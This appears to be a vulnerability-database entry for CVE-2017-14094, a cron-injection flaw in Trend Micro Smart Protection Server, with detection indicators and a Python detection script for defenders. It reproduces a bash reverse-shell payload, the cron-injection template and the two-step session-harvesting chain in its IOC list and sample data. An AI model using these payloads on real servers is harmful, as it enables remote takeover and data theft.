cbcvebase.
CVE-2017-14094
published 2018-01-19

Priority: P2 · 74 · Critical 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: available
EPSS: 19.37% (97.0th percentile)
A vulnerability in Trend Micro Smart Protection Server (Standalone) versions 3.2 and below could allow an attacker to perform remote command execution via a cron job injection on a vulnerable system.

Affected (2 ranges)

Vendor        Product                               Version range   Fixed in
trend_micro   trend_micro_smart_protection_server   -               -
trendmicro    smart_protection_server               <= 3.2          -

Detection & IOCs (extracted from sources)

  • path: /widget/repository/log/diagnostic.log
  • path: /var/spool/cron/webserv
  • path: /var/www/AdminUI/php/admin_update_program.php
  • path: /var/www/AdminUI/php/inc/crontab.php
  • path: /widget/inc/widget_package_manager.php
  • url: https://<host>:<port>/widget/repository/log/diagnostic.log
  • url: https://<host>:<port>/php/admin_update_program.php?sid=<session_id>
  • command: * * * * * %s #
  • command: bash -i >& /dev/tcp/192.168.45.80/8888 0>&1
  • port: 4343
  • port: 8888

  • Monitor for unauthenticated HTTP GET requests to /widget/repository/log/diagnostic.log, which leaks active session IDs from diagnostic logs and is the first stage of the exploit chain.
  • Detect HTTP POST requests to /php/admin_update_program.php where the hidTimingMin parameter contains cron injection patterns such as '* * * * *' or shell metacharacters (e.g., '#', ';', '|').
  • Alert on creation or modification of /var/spool/cron/webserv, especially if the cron entry contains shell commands or reverse shell payloads injected via the hidTimingMin field.
  • Detect the presence of 'MSG_UPDATE_UPDATE_SCHEDULE' in HTTP responses to POST /php/admin_update_program.php as a confirmation indicator that a malicious cron job was successfully injected.
  • Monitor for outbound bash reverse shell connections (e.g., /dev/tcp/<attacker_ip>/<port>) spawned by the webserv user, which indicates successful cron job injection exploitation.
  • Each log entry in diagnostic.log leaks the session ID in the 4th comma-delimited field; monitor for automated parsing of this file (rapid sequential GET requests) as a sign of session harvesting.
  • The exploit chain requires two steps: first, unauthenticated session ID harvesting from the exposed diagnostic log, then an authenticated POST to the cron injection endpoint. Blocking unauthenticated access to /widget/repository/log/diagnostic.log breaks the chain for unauthenticated attackers.
  • Only Trend Micro Smart Protection Server 3.2 (Build 1085) was confirmed tested; other versions may also be affected but were not verified.
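The detection bullets above, turned into runnable checks and run over constructed samples. This is an added example, not code from this page, the exploit author or Trend Micro. It assumes an Apache combined-format access log, that a legitimate hidTimingMin value is a plain minute number, a tuning threshold for "rapid sequential" diagnostic.log reads, and a hypothetical legitimate cron entry (/usr/local/bin/update_program.sh); none of these come from the advisory.

```python
"""Detection logic for the CVE-2017-14094 exploit chain (added example).

  inspect_request      reads of diagnostic.log, cron-injection payloads in hidTimingMin
  injection_confirmed  MSG_UPDATE_UPDATE_SCHEDULE in the endpoint's reply
  harvest_bursts       one client pulling diagnostic.log repeatedly (session harvesting)
  audit_crontab        injected entries in /var/spool/cron/webserv
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

DIAG_LOG = "/widget/repository/log/diagnostic.log"
CRON_ENDPOINT = "/php/admin_update_program.php"

# Five '*' schedule fields or shell metacharacters inside a minute value.
CRON_PATTERN = re.compile(r"\*\s+\*\s+\*\s+\*\s+\*|[#;|&`$<>]")
# Reverse-shell idioms: the published payload plus common variants.
REVSHELL = re.compile(r"/dev/tcp/|bash\s+-i|nc\s+-e|mkfifo")
# Apache combined-log prefix (assumed format; adjust for the real web server).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def inspect_request(method, path, params):
    """Findings for one request; params is the decoded form/query dict."""
    findings = []
    if method == "GET" and path == DIAG_LOG:
        findings.append("stage 1: read of diagnostic.log (leaks session IDs)")
    if method == "POST" and path == CRON_ENDPOINT:
        val = params.get("hidTimingMin")
        # Assumption: a legitimate minute value is digits only (0-59).
        if val is not None and (CRON_PATTERN.search(val) or not val.isdigit()):
            findings.append(f"stage 2: cron injection via hidTimingMin={val!r}")
    return findings


def injection_confirmed(path, response_body):
    """The endpoint answers MSG_UPDATE_UPDATE_SCHEDULE when the schedule was stored;
    paired with a stage-2 finding this confirms the cron entry landed on disk."""
    return path == CRON_ENDPOINT and "MSG_UPDATE_UPDATE_SCHEDULE" in response_body


def parse_access_log(text):
    """Yield (timestamp, client_ip, method, path-without-query) per log line."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, target, _status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        yield when, ip, method, target.split("?", 1)[0]


def harvest_bursts(entries, threshold=3, window=timedelta(seconds=60)):
    """Clients that read diagnostic.log `threshold` times within `window`
    (both values are tuning assumptions, not from the advisory)."""
    recent = defaultdict(list)
    flagged = set()
    for when, ip, method, path in sorted(entries):
        if method != "GET" or path != DIAG_LOG:
            continue
        hits = recent[ip]
        hits.append(when)
        while when - hits[0] > window:      # drop reads outside the window
            hits.pop(0)
        if len(hits) >= threshold:
            flagged.add(ip)
    return flagged


def audit_crontab(text):
    """Entries of /var/spool/cron/webserv that look injected: the payload template
    '* * * * * <cmd> #' leaves a '#' inside the command (it comments out the tail
    of the original entry), and the command itself may be a reverse shell."""
    bad = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)        # five schedule fields + command
        if len(parts) < 6:
            continue
        cmd = parts[5]
        if re.search(r"\s#", cmd) or REVSHELL.search(cmd):
            bad.append(line)
    return bad


# Constructed samples (not real logs). 192.168.45.80 is the listener from the IOCs.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [19/Jan/2018:10:00:01 +0000] "GET /widget/index.php HTTP/1.1" 200 512
192.168.45.80 - - [19/Jan/2018:10:00:10 +0000] "GET /widget/repository/log/diagnostic.log HTTP/1.1" 200 18342
192.168.45.80 - - [19/Jan/2018:10:00:12 +0000] "GET /widget/repository/log/diagnostic.log HTTP/1.1" 200 18342
192.168.45.80 - - [19/Jan/2018:10:00:14 +0000] "GET /widget/repository/log/diagnostic.log HTTP/1.1" 200 18399
192.168.45.80 - - [19/Jan/2018:10:00:25 +0000] "POST /php/admin_update_program.php?sid=deadbeef HTTP/1.1" 200 1043
"""
# Hypothetical legitimate entry, then the line the injection template produces.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/local/bin/update_program.sh
* * * * * bash -i >& /dev/tcp/192.168.45.80/8888 0>&1 # 3 * * * /usr/local/bin/update_program.sh
"""
# Access logs carry no POST body; a WAF or proxy log would supply this decoded form.
SAMPLE_POST = {"hidTimingMin": "* * * * * bash -i >& /dev/tcp/192.168.45.80/8888 0>&1 #"}

if __name__ == "__main__":
    for when, ip, method, path in parse_access_log(SAMPLE_ACCESS_LOG):
        for finding in inspect_request(method, path, {}):
            print(ip, finding)
    print("session harvesting from:", harvest_bursts(parse_access_log(SAMPLE_ACCESS_LOG)))
    print(inspect_request("POST", CRON_ENDPOINT, SAMPLE_POST))
    print("injected crontab lines:", audit_crontab(SAMPLE_CRONTAB))
```

The access log alone cannot see hidTimingMin, so feed inspect_request from a source that records decoded POST bodies (a WAF, reverse proxy or mod_security audit log); a stage-2 finding followed by injection_confirmed on the same request is the strongest signal short of the crontab change itself, which audit_crontab catches from the file.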

CVSS provenance

Source  Version  Score  Severity  Vector
nvd     v3.0     9.8    CRITICAL  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd     v2.0     7.5    HIGH      AV:N/AC:L/Au:N/C:P/I:P/A:P